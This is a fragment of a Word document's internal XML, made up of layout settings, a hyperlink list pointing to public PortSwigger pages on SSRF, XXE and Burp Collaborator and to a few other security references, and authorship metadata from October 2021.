      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="795562344">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="958490152">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="522400236">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="996768226">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1099986181">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1132672476">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1174764805">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1636258954">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1195076019">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1267925986">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1373193081">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1409300965">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1493594464">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1593322593">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1618367089">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1684236348">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1665471016">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1674257353">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1698189516">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1759595142">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1765110124">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1836412642">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1868257158">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1009286963">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1886944702">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1919711181">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1996567751">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2016497896">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="206321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swigger.net/burp/documentation/desktop/tools/collaborator-client" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/pro" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/rce-in-jxbrowser-javascript-java-bridge" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf"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portswigger.net/burp/documentation/collaborator" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf/blind" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/documentation/desktop/tools/collaborator-client" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/xx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swigger.net/burp/application-security-testing/oast" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lcamtuf.coredump.cx/p0f3/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/documentation/desktop/tools/collaborator-client" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SpiderLabs/Responder" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hackxor.net/mission?id=4" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/access-control" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/documentation/desktop/tools/target/scope" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf/blind" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/pro" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phrack.org/issues/57/10.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/xxe" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/access-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17</Pages>
  <Words>4592</Words>
  <Characters>26178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Narayana</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>K, Narayana</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-08T16:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-09T05:50:00Z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759c52-a6db-4813-b00f-5ea20e29646d_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_34759c52-a6db-4813-b00f-5ea20e29646d_SetDate">
    <vt:lpwstr>2021-10-08T16:34:03Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_34759c52-a6db-4813-b00f-5ea20e29646d_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_34759c52-a6db-4813-b00f-5ea20e29646d_Name">
    <vt:lpwstr>Public</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_34759c52-a6db-4813-b00f-5ea20e29646d_SiteId">
    <vt:lpwstr>945c199a-83a2-4e80-9f8c-5a91be5752dd</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_34759c52-a6db-4813-b00f-5ea20e29646d_ActionId">
    <vt:lpwstr>8f12f10b-08f2-4bad-a89c-888f3419fe3a</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_34759c52-a6db-4813-b00f-5ea20e29646d_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>